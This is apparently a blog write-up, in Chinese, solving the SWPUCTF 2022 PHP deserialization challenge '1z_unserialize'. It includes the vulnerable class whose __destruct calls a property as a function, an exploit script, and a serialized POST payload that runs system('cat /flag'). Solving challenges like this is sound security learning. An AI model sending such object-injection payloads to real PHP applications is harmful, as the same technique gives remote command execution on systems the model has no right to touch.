[SWPUCTF 2022 新生赛]1z_unserialize

题目描述:是很简单的反序列化噢

代码审计看注释

php 复制代码
<?php
 
class lyh{											//定义一个类为lyh
    public $url = 'NSSCTF.com';//公共属性,初始值为NSSCTF.com
    public $lt;									//公共属性,没有初始值
    public $lly;								//公共属性,没有初始值
     
     function  __destruct()	//__destruct()方法是php中的一个魔术方法,当对象被销毁是自动调用
     {
        $a = $this->lt;					
       //在这个方法中$a被赋值为$this->lt,然后$a($this->lly)被调用,这意味这$this->lt应给是一个
       //可以调用的函数或方法,	而$this-lly是传递给这个函数的参数

        $a($this->lly);
     }
    
    
}
unserialize($_POST['nss']);
//这行代码从POST请求中获取nss参数,并将其反序列化为php对象。反序列操作会将字符串转换回PHP对象
highlight_file(__FILE__);
 
 
?>
  1. 补充大佬的解释
  2. a($this->lly): 将 $this->lly 的值作为参数传递$a 所代表的函数。
  3. a = this->lt;a(this->lly);相当于lt(lly):很想命令执行函数+指令
  4. 所以我们可以通过构造一个恶意的序列化对象,将自定义的函数传递给lt属性,然后将要执行的代码(或指向一个恶意代码文件的路径)传递给lly属性。当对象被序列化后在被反序列化是,__destruct方法会被自动调用,从而执行指定的恶意操作。
  5. 只要传参把a变成system();,this-lly变成ls或者cat就是一个简单的命令注入了system("cat /flag");

写出php脚本exp

php 复制代码
<?php
class lyh{
   public $url = 'NSSCTF.com';
   public $lt = "system";
   public $lly = "cat /flag";
}

$sss = new lyh();
echo serialize($sss);
//O:3:"lyh":3:{s:3:"url";s:10:"NSSCTF.com";s:2:"lt";s:6:"system";s:3:"lly";s:9:"cat /flag";}

POST传参nss=O:3:"lyh":3:{s:3:"url";s:10:"NSSCTF.com";s:2:"lt";s:6:"system";s:3:"lly";s:9:"cat /flag";}

相关推荐
两个人的幸福10 天前
Windows 桌面应用自研 PHP 队列(下):完整代码与六大工程化优化
php
BingoGo12 天前
PHP 泛型之殇 泛型 RFC 提案被拒绝
后端·php
JaguarJack12 天前
PHP 泛型之殇 泛型 RFC 提案被拒绝
后端·php
用户30745969820713 天前
PHP 扩展——从入门到理解
php
鹏仔先生14 天前
拷贝漫画APP下载页PHP程序,后台带免费AI写作
php
云水一下14 天前
从零开始学 PHP 系列(一):PHP 的前世今生与开发环境搭建
开发语言·php
xingpanvip14 天前
星盘接口开发文档:本命盘接口指南
android·开发语言·css·php·lua
酉鬼女又兒14 天前
零基础入门计算机网络运输层:端到端通信核心作用、端口号分类规则、复用分用工作机制及UDP与TCP协议全方位对比详解
网络·网络协议·tcp/ip·计算机网络·考研·udp·php
dog25014 天前
不要再继续优化 TCP
网络协议·tcp/ip·php
Channing Lewis14 天前
PHP 解析 Excel 的那些坑:一次“行号错位”引发的数据丢失
开发语言·php·excel